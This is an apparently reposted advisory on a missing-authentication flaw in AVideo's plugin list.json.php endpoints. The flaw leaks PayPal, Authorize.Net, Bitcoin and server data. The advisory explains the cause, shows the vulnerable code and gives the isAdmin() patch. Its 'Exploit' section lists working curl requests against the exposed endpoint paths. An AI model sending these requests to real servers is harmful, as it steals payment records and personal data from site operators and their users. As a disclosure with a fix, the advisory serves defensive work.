Listen to this Post
The vulnerability exists because the AVideo ObjectYPT CRUD pattern generates `list.json.php` endpoints for multiple plugins without enforcing authentication. Unlike their `add.json.php` and `delete.json.php` counterparts, which check User::isAdmin(), these list endpoints lack any authorization. The `configuration.php` bootstrap does not globally gate access, and no `.htaccess` rules protect the plugin View directories. The `getAll()` method, inherited from ObjectYPT, directly queries the database (e.g., SELECT FROM PayPalYPT_log), returning all records. This flaw affects 21 endpoints, including payment plugins. This same class of vulnerability was patched in the Scheduler plugin (GHSA-j724-5c6c-68g5 / commit 83390ab1f), but the fix was not applied to the remaining endpoints. Attackers can retrieve sensitive data like PayPal billing agreement IDs, Express Checkout tokens, Authorize.Net webhook payloads, Bitcoin transaction details, and even live server infrastructure data via unauthenticated GET requests. The exposed data includes full API JSON responses, user IDs, payment amounts, and personally identifiable information (PII).
dailycve form:
Platform: AVideo
Version: All prior
Vulnerability: Missing Auth
Severity: Critical
date: 2026-03-30
Prediction: 2026-04-06
What Undercode Say:
Check for unauthenticated access to PayPal logs curl -s 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php' | jq .
// Vulnerable code pattern
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/PayPalYPT/Objects/PayPalYPT_log.php';
header('Content-Type: application/json');
$rows = PayPalYPT_log::getAll(); // No User::isAdmin() check
echo json_encode($rows);
Search for all affected endpoints find /path/to/avideo -name "list.json.php" -path "/View/" | grep -E "(PayPalYPT|AuthorizeNet|BTCPayments|AI|Live|Meet|UserConnections)"
Exploit:
curl -s 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php' curl -s 'https://target.com/plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php' curl -s 'https://target.com/plugin/BTCPayments/View/Btc_payments/list.json.php' curl -s 'https://target.com/plugin/Live/view/Live_servers/list.json.php'
Protection from this CVE:
Add `User::isAdmin()` check immediately after `require_once` and `header()` in each affected `list.json.php` file:
if (!User::isAdmin()) {
$obj = new stdClass();
$obj->error = true;
$obj->msg = "You can't do this";
die(json_encode($obj));
}
Apply to the 21 listed endpoints and ensure `.htaccess` restricts direct access to plugin directories.
Impact:
- Unauthenticated full database table exposure
- Financial data leakage (PayPal, Authorize.Net, Bitcoin)
- Token and PII compromise
- Zero-interaction remote exploitation
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

